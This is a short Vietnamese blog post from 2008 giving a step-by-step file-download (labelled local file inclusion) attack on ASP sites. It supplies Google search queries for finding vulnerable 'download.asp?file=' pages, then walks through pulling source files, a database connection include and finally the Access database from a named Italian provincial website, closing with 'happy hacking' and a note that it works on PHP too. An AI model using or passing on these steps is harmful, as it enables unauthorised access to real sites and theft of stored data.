Jun 10, 2008
75 Views

Local File Inclusion

Written by

Google gõ keyword:
allinurl: “download.asp?file=”
allinurl: “dl.asp?file=”
ra hàng loạt , lấy thằng này làm ví dụ nhé .
http://www.provincia.so.it/download.asp?file=
thêm default.asp vào
http://www.provincia.so.it/download.asp?file=default.asp
down cái file đó về mở ra thấy
<!–#INCLUDE VIRTUAL=”/include/connettiDB.asp”–>
thay tiếp vào đường dẫn vào
http://www.provincia.so.it/download.asp?file=include/connettiDB.asp
ồi tiếp tục down cái file đó về mở ra thấy
percorsoDatabase=”/database/DBSito.mdb
giờ thì xong rồi
http://www.provincia.so.it/download.asp?file=database/DBSito.mdb
Hack vui vẻ . Áp dụng luôn cho cả mã nguồn php .

Article Tags:
· · · · ·
Article Categories:
Bug & Security
    http://linholiver.com

    https://linholiver.com/diary/about/